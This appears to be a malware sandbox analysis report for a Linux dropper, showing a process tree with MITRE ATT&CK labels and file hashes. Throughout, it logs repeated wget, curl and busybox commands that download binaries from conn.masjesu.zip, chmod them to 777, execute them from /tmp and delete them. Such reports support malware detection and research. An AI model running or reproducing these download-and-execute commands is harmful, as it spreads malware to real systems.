/bin/chmodchmod 777 jRM4slh846TuCfMSUvIaQLCg29n4oFbP3o2⤵
- File and Directory Permissions Modification
PID:944
-
-
/tmp/jRM4slh846TuCfMSUvIaQLCg29n4oFbP3o./jRM4slh846TuCfMSUvIaQLCg29n4oFbP3o2⤵
- Executes dropped EXE
PID:945
-
-
/bin/rmrm jRM4slh846TuCfMSUvIaQLCg29n4oFbP3o2⤵PID:946
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/xOXcb0EhgEUriloemCzxNbO7pDrV8hlUkw2⤵
- System Network Configuration Discovery
PID:947
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/xOXcb0EhgEUriloemCzxNbO7pDrV8hlUkw2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:948
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/xOXcb0EhgEUriloemCzxNbO7pDrV8hlUkw2⤵
- System Network Configuration Discovery
PID:950
-
-
/bin/chmodchmod 777 xOXcb0EhgEUriloemCzxNbO7pDrV8hlUkw2⤵
- File and Directory Permissions Modification
PID:951
-
-
/tmp/xOXcb0EhgEUriloemCzxNbO7pDrV8hlUkw./xOXcb0EhgEUriloemCzxNbO7pDrV8hlUkw2⤵
- Executes dropped EXE
PID:952
-
-
/bin/rmrm xOXcb0EhgEUriloemCzxNbO7pDrV8hlUkw2⤵PID:953
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/fBl2KigufHZnmQqWghZFomThmvhAVfHNsF2⤵
- System Network Configuration Discovery
PID:954
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/fBl2KigufHZnmQqWghZFomThmvhAVfHNsF2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:955
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/fBl2KigufHZnmQqWghZFomThmvhAVfHNsF2⤵
- System Network Configuration Discovery
PID:957
-
-
/bin/chmodchmod 777 fBl2KigufHZnmQqWghZFomThmvhAVfHNsF2⤵
- File and Directory Permissions Modification
PID:958
-
-
/tmp/fBl2KigufHZnmQqWghZFomThmvhAVfHNsF./fBl2KigufHZnmQqWghZFomThmvhAVfHNsF2⤵
- Executes dropped EXE
PID:959
-
-
/bin/rmrm fBl2KigufHZnmQqWghZFomThmvhAVfHNsF2⤵PID:960
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/9ekUy3pPFLPyGLw2h6RfxlOZRK2qt1lZFB2⤵PID:961
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/9ekUy3pPFLPyGLw2h6RfxlOZRK2qt1lZFB2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:962
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/9ekUy3pPFLPyGLw2h6RfxlOZRK2qt1lZFB2⤵
- System Network Configuration Discovery
PID:964
-
-
/bin/chmodchmod 777 9ekUy3pPFLPyGLw2h6RfxlOZRK2qt1lZFB2⤵
- File and Directory Permissions Modification
PID:965
-
-
/tmp/9ekUy3pPFLPyGLw2h6RfxlOZRK2qt1lZFB./9ekUy3pPFLPyGLw2h6RfxlOZRK2qt1lZFB2⤵
- Executes dropped EXE
PID:966
-
-
/bin/rmrm 9ekUy3pPFLPyGLw2h6RfxlOZRK2qt1lZFB2⤵PID:967
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/SDrKCJtYQfPpcBO9zir4tVbwwn8j2iJ4ca2⤵PID:968
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/SDrKCJtYQfPpcBO9zir4tVbwwn8j2iJ4ca2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:969
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/SDrKCJtYQfPpcBO9zir4tVbwwn8j2iJ4ca2⤵
- System Network Configuration Discovery
PID:971
-
-
/bin/chmodchmod 777 SDrKCJtYQfPpcBO9zir4tVbwwn8j2iJ4ca2⤵
- File and Directory Permissions Modification
PID:972
-
-
/tmp/SDrKCJtYQfPpcBO9zir4tVbwwn8j2iJ4ca./SDrKCJtYQfPpcBO9zir4tVbwwn8j2iJ4ca2⤵
- Executes dropped EXE
PID:973
-
-
/bin/rmrm SDrKCJtYQfPpcBO9zir4tVbwwn8j2iJ4ca2⤵PID:974
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/L3L3AWJWz1jZhxSYZHCvA9q8LdsOc9rGey2⤵PID:975
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/L3L3AWJWz1jZhxSYZHCvA9q8LdsOc9rGey2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:976
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/L3L3AWJWz1jZhxSYZHCvA9q8LdsOc9rGey2⤵
- System Network Configuration Discovery
PID:978
-
-
/bin/chmodchmod 777 L3L3AWJWz1jZhxSYZHCvA9q8LdsOc9rGey2⤵
- File and Directory Permissions Modification
PID:979
-
-
/tmp/L3L3AWJWz1jZhxSYZHCvA9q8LdsOc9rGey./L3L3AWJWz1jZhxSYZHCvA9q8LdsOc9rGey2⤵
- Executes dropped EXE
PID:980
-
-
/bin/rmrm L3L3AWJWz1jZhxSYZHCvA9q8LdsOc9rGey2⤵PID:981
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/vlBRkxc2pXZfCqjxBIXpWIdWRcl8qgnFod2⤵
- System Network Configuration Discovery
PID:982
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/vlBRkxc2pXZfCqjxBIXpWIdWRcl8qgnFod2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:983
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/vlBRkxc2pXZfCqjxBIXpWIdWRcl8qgnFod2⤵
- System Network Configuration Discovery
PID:985
-
-
/bin/chmodchmod 777 vlBRkxc2pXZfCqjxBIXpWIdWRcl8qgnFod2⤵
- File and Directory Permissions Modification
PID:986
-
-
/tmp/vlBRkxc2pXZfCqjxBIXpWIdWRcl8qgnFod./vlBRkxc2pXZfCqjxBIXpWIdWRcl8qgnFod2⤵
- Executes dropped EXE
PID:987
-
-
/bin/rmrm vlBRkxc2pXZfCqjxBIXpWIdWRcl8qgnFod2⤵PID:988
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/5ZJMWA4qvJDnVJiAuQPlROzRn70kAg8FpG2⤵PID:989
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/5ZJMWA4qvJDnVJiAuQPlROzRn70kAg8FpG2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:990
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/5ZJMWA4qvJDnVJiAuQPlROzRn70kAg8FpG2⤵PID:992
-
-
/bin/chmodchmod 777 5ZJMWA4qvJDnVJiAuQPlROzRn70kAg8FpG2⤵
- File and Directory Permissions Modification
PID:993
-
-
/tmp/5ZJMWA4qvJDnVJiAuQPlROzRn70kAg8FpG./5ZJMWA4qvJDnVJiAuQPlROzRn70kAg8FpG2⤵
- Executes dropped EXE
PID:994
-
-
/bin/rmrm 5ZJMWA4qvJDnVJiAuQPlROzRn70kAg8FpG2⤵PID:995
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/2ffYLp5CKNrI7Xt5HXl6mWqJj4hneNkta42⤵
- System Network Configuration Discovery
PID:996
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/2ffYLp5CKNrI7Xt5HXl6mWqJj4hneNkta42⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:997
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/2ffYLp5CKNrI7Xt5HXl6mWqJj4hneNkta42⤵
- System Network Configuration Discovery
PID:999
-
-
/bin/chmodchmod 777 2ffYLp5CKNrI7Xt5HXl6mWqJj4hneNkta42⤵
- File and Directory Permissions Modification
PID:1000
-
-
/tmp/2ffYLp5CKNrI7Xt5HXl6mWqJj4hneNkta4./2ffYLp5CKNrI7Xt5HXl6mWqJj4hneNkta42⤵
- Executes dropped EXE
PID:1001
-
-
/bin/rmrm 2ffYLp5CKNrI7Xt5HXl6mWqJj4hneNkta42⤵PID:1002
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/qkWlgSeyWC2V2IsRcOXMQJnDkM0rWsXBQq2⤵PID:1003
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/qkWlgSeyWC2V2IsRcOXMQJnDkM0rWsXBQq2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:1004
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/qkWlgSeyWC2V2IsRcOXMQJnDkM0rWsXBQq2⤵
- System Network Configuration Discovery
PID:1006
-
-
/bin/chmodchmod 777 qkWlgSeyWC2V2IsRcOXMQJnDkM0rWsXBQq2⤵
- File and Directory Permissions Modification
PID:1007
-
-
/tmp/qkWlgSeyWC2V2IsRcOXMQJnDkM0rWsXBQq./qkWlgSeyWC2V2IsRcOXMQJnDkM0rWsXBQq2⤵
- Executes dropped EXE
PID:1008
-
-
/bin/rmrm qkWlgSeyWC2V2IsRcOXMQJnDkM0rWsXBQq2⤵PID:1009
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
153B
MD5998368d7c95ea4293237f2320546e440
SHA130dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97